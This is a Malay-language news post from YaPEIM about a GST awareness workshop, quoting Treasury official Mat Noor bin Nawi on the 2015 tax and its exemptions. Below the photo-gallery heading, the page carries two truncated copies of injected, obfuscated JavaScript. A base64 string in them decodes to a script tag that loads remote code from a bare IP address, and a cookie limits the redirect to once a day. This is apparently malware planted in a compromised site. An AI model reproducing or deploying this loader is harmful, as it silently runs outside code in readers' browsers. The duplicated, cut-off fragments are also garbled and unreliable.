YaPEIM » Jangan Takut Dengan Cukai – TKSU Perbendaharaan

Terkini

Jangan Takut Dengan Cukai – TKSU Perbendaharaan

Majlis Bengkel Kesedaran Cukai Barangan & Perkhidmatan (GST) Dirasmikan oleh Y.Bhg Dato’ Mat Noor bin Nawi

JANGAN TAKUT DENGAN CUKAI

CUKAI  yang dikenali sebagai cukai barangan dan perkhidmatan (GST) sebanyak 6 peratus yang akan dilaksanakan mulai 1 April 2015 sukar difahamkan kepada orang ramai kerana cukai adalah sesuatu topik yang tidak menjadi minat orang ramai.

Timbalan Ketua Setiausaha Perbendaharaan Kementerian Kewangan, Dato’ Mat Noor bin Nawi  ketika merasmikan Bengkel Kesedaran Cukai Barangan dan Perkhidmatan (GST) di Dewan Utama YaPEIM Tingkat 7, Grand Seasons Avenue Kuala Lumpur, pagi ini berkata:

“Kerajaan di seluruh dunia perlu mengenakan cukai untuk mendapatkan hasil bagi membolehkan keperluan sosial rakyat (infrastruktur, kesihatan dan pendidikan), pertumbuhan industri yang membawa kepada peluang-peluang pekerjaan, keperluan sekuriti dan sebagainya.

“GST bukanlah sesuatu yang baru kerana ia mengantikan cukai yang lama. Jangan takut kepada cukai sebagaimana kita tidak takut membayar zakat,” katanya.

Turut hadir Presiden & Pengerusi Lembaga Pemegang Amanah YaPEIM, Dato’ Abd Malek Awang Kechil; Ketua Pengarah YaPEIM, En.Abibullah Hj Samsudin; Pengarah-Pengarah Kanan dan warga YaPEIM

Bengkel GST bertujuan memberi kesedaran dan mendedahkan kemahiran teknikal kepada staf dan barisan pengurusan YaPEIM berikutan langkah kerajaan menguatkuasakan pelaksanaan GST bermula April 2015.

Pengenalan GST merupakan sebahagian program penyusunan semula cukai kerajaan ke arah menjadikan sistem pencukaian lebih cekap, berkesan dan telus, mesra perniagaan dan berupaya menjana hasil yang stabil.

GST akan mengantikan cukai jualan dan perkhidmatan (SST) bagi mengelak berlakunya cukai berperingkat, cukai bertindih, pemindahan harga dan  nilai pindah, tiada pelepasan lengkap barang dieksport, mengalakkan integrasi menegak, kerenah birokrasi pentadbiran dan isu-isu klasifikasi dan lain-lain.

Perdana Menteri, Datuk Seri Mohd Najib Tun Razak ketika membentangkan Bajet 2014 mengumumkan pelaksanaan cukai baru GST akan mula dilaksanakan mulai 1 April 2014.

Mat Noor berkata, langkah untuk melewatkan sedikit pelaksanaan itu selepas pengumuman Bajet adalah untuk membolehkan orang ramai bersiap sedia dari segi kefahaman.

“Dari segi Kementerian kita sudah bersiap sedia untuk melaksanakan tetapi pelaksanaan biarlah berlaku dengan teratur dan rakyat dan di kalangan pengusaha industri kecil dan sederhana (IKS) sempat bersedia.

“Inilah sebabnya kerajaan memberikan masa di antara 13 hingga 18 bulan tempoh sejak pengumuman Bajet 2014,” katanya.

Halangan kedua, kata Mat Noor, kebiasaan orang ramai tidak suka dengan sesuatu cukai, walaupun GST merupakan perubahan kepada cukai jualan dan cukai perkhidmatan (SST).

“Apabila disebut bahawa GST adalah satu bentuk cukai, kebiasaannya anda akan berhadapan dengan tentangan.

“Malahan, orang ramai juga tidak sedar bahawa mereka sedang membayar cukai jualan dan cukai perkhidmatan ke atas kebanyakan barang dan perkhidmatan kerana ia adalah cukai seperingkat,” katanya.

Mat Noor turut menjelaskan,  barangan makanan asas tidak dikenakan GST untuk negara ini seperti beras, gula, garam, tepung dan minyak masak.

Selain itu,  barang dan perkhidmatan yang dikecualikan termasuklah

– Perkhidmatan yang disediakan oleh kerajaan: pengeluaran pasport, perkhidmatan kesihatan, pembelajaran di sekolah.

– Perkhidmatan pengangkutan: bas, keretapi, LRT, teksi, feri, bot, tol lebuh raya.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top